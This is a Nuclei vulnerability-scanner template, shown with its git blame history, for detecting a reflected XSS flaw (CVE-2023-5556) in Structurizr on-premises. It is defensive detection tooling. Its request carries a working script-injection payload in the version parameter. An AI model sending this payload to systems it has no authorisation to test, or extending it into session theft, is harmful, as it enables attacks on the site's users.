nuclei-templates/http/cves/2023/CVE-2023-5556.yaml

id: CVE-2023-5556

info:
  name: Structurizr on-premises - Cross Site Scripting
  author: shankar acharya
  severity: medium
  description: Cross-site Scripting (XSS) - Reflected in GitHub repository structurizr/onpremises prior to 3194.
  reference:
    https://huntr.com/bounties/a3ee0f98-6898-41ae-b1bd-242a03a73d1b/
    https://github.com/structurizr/onpremises/commit/6cff4f792b010dfb1ff6a0b4ae1c6e398f8f8a18
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Apply the latest security patches or updates provided by Structurizr to fix the XSS vulnerability.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-5556
    cwe-id: CWE-79
    epss-score: 0.00046
    epss-percentile: 0.14386
    cpe: cpe:2.3:a:structurizr:on-premises_installation:*:*:*:*:*:*:*:*
  metadata:
    vendor: structurizr
    product: on-premises_installation
  tags: cve,cve2023,xss,structurizr

http:
  - method: GET
    path:
      - "{{BaseURL}}/workspace/1/?version=1%22);alert(1);"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - ";alert(1);"

      - type: word
        part: header
        words:
          - text/html
Create CVE-2023-5556 2023-11-17 06:19:48 +00:00			`id: CVE-2023-5556`

			`info:`
			`name: Structurizr on-premises - Cross Site Scripting`
			`author: shankar acharya`
			`severity: medium`
			`description: Cross-site Scripting (XSS) - Reflected in GitHub repository structurizr/onpremises prior to 3194.`
			`reference:`
			`https://huntr.com/bounties/a3ee0f98-6898-41ae-b1bd-242a03a73d1b/`
			`https://github.com/structurizr/onpremises/commit/6cff4f792b010dfb1ff6a0b4ae1c6e398f8f8a18`
renamed and updated info 2023-11-17 06:25:45 +00:00			`impact: \|`
			`Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.`
			`remediation: \|`
			`Apply the latest security patches or updates provided by Structurizr to fix the XSS vulnerability.`
Create CVE-2023-5556 2023-11-17 06:19:48 +00:00			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N`
			`cvss-score: 6.1`
			`cve-id: CVE-2023-5556`
			`cwe-id: CWE-79`
			`epss-score: 0.00046`
			`epss-percentile: 0.14386`
			`cpe: cpe:2.3:a:structurizr:on-premises_installation::::::::`
			`metadata:`
			`vendor: structurizr`
			`product: on-premises_installation`
renamed and updated info 2023-11-17 06:25:45 +00:00			`tags: cve,cve2023,xss,structurizr`
Create CVE-2023-5556 2023-11-17 06:19:48 +00:00
			`http:`
			`- method: GET`
			`path:`
			`- "{{BaseURL}}/workspace/1/?version=1%22);alert(1);"`

			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`words:`
			`- ";alert(1);"`

			`- type: word`
			`part: header`
			`words:`
			`- text/html`